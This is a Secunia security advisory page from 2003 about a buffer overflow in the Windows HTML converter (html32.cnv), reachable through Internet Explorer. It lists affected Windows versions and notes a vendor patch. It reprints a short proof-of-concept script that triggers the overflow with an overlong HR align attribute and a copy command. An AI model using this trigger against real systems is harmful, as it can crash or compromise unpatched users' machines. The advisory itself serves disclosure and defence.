Secunia Logo  


Secunia PSI WorldMap
 
Microsoft Windows HTML Converter Buffer Overflow Vulnerability
Secunia Advisory: SA9113
Release Date: 2003-06-25
Last Update: 2003-07-12
Popularity: 16,006 views

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS:Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows Millenium
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Microsoft Windows NT 4.0 Workstation
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional

Secunia CVSS-2 Score: Available in Secunia business solutions

Subscribe: Instant alerts on relevant vulnerabilities


Advisory Content (Page 1 of 3)[ 1 ] [ 2 ] [ 3 ]

Description:
A vulnerability has been identified in all supported Windows versions, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error in "html32.cnv", when handling conversion requests during cut-and-paste operations. One attack vector is through a HTML document containing specially crafted script code, which will cause a buffer overflow when viewed in Internet Explorer.

Successful exploitation allows execution of arbitrary code on the user's system with the user's privileges, but requires that the user is tricked into visiting a malicious web site or view a malicious HTML based email.

The following example was provided in the original advisory. It opens a new window and then adds a horizontal rule (using <HR> tag) with an overly long argument supplied to the "align" attribute. The content is then copied and the window is closed, which triggers the overflow.

<script>
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
</script>


NOTE: Internet Explorer on Windows Server 2003 runs in "Enhanced Security Configuration" by default and therefore prevents the vulnerability from being exploited automatically. However, if this has been disabled, the vulnerability can be exploited.

Change Page:
[ 1 ] [ 2 ] [ 3 ]



Track this Secunia Advisory
Customers of the Secunia Vulnerability Intelligence solutions will automatically receive updates when new information regarding this advisory is released.

Read more about our Vulnerability Intelligence solutions and what they can do for you and your company.

About this Secunia Advisory
Please note: The information that this Secunia Advisory is based on comes from a third party unless stated otherwise.

Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others.
  
Latest Advisories

Send Feedback to Secunia
If you have new information regarding this Secunia advisory or a product in our database, please send it to us using either our web form or email us at vuln@secunia.com.

Ideas, suggestions, and other feedback are most welcome.

Most Popular - 3 Hours

1. Sun Java JDK / JRE Multiple Vulnerabilities // 54 views
2. Internet Explorer Charset Inheritance Cross-Site Scripting Vulnerability // 39 views
3. Microsoft Windows Win32k Kernel-Mode Driver Multiple Vulnerabilities // 35 views
4. Adobe Flash Player Multiple Vulnerabilities // 31 views
5. Adobe Reader/Acrobat Multiple Vulnerabilities // 29 views
6. Debian update for pidgin // 24 views
7. Apple Safari Multiple Vulnerabilities // 18 views
8. Mozilla Firefox Multiple Vulnerabilities // 14 views
9. Google Chrome Two Vulnerabilities // 13 views
10. Windows Web Services on Devices API Memory Corruption Vulnerability // 13 views